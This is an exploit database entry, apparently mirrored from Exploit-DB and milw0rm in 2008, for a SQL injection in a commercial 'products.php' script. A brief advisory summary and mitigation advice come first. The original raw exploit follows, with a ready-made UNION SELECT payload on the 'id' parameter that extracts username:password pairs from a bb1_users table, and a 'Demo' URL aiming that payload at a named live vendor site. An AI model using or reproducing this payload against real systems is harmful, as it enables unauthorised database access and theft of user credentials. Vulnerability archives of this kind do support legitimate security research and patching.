SQL Injection Vuln.

vendor:

products.php

by:

TR-ShaRk

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: products.php

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

The vulnerability exists in the 'products.php' script, which allows an attacker to inject arbitrary SQL commands via the 'id' parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. This can allow the attacker to gain access to sensitive information from the database, such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements.

Source

Exploit-DB raw data:

##################################################################
#
#   Author: TR-ShaRk
#
######################
#
#   Web   : StarHack.Us OldKral.Com
#
######################
#
#   Emai   : Admin@tr-shark.org
#
######################
#
#   Script price : 19,00â‚¬
#
#   Here:http://1st-scripts.de/products.php?id=18&associate=
#
#
######################
#
#   SQL Injection Vuln. :
#   products.php?id=00+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+bb1_users--
#
#
######################
#
#   Demo:
#
#   http://1st-scripts.de/products.php?id=00+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+bb1_users--
#
######################
SEHITLER Ã–LMEZ VATAN BÃ–LÃœNMEZ
Greetz: STR0KE , WEBLOADER , REALWOLKER , KOMANDO , CEYPOWER , ARANELWORM , MYSTICAL_DEWIL

# milw0rm.com [2008-11-02]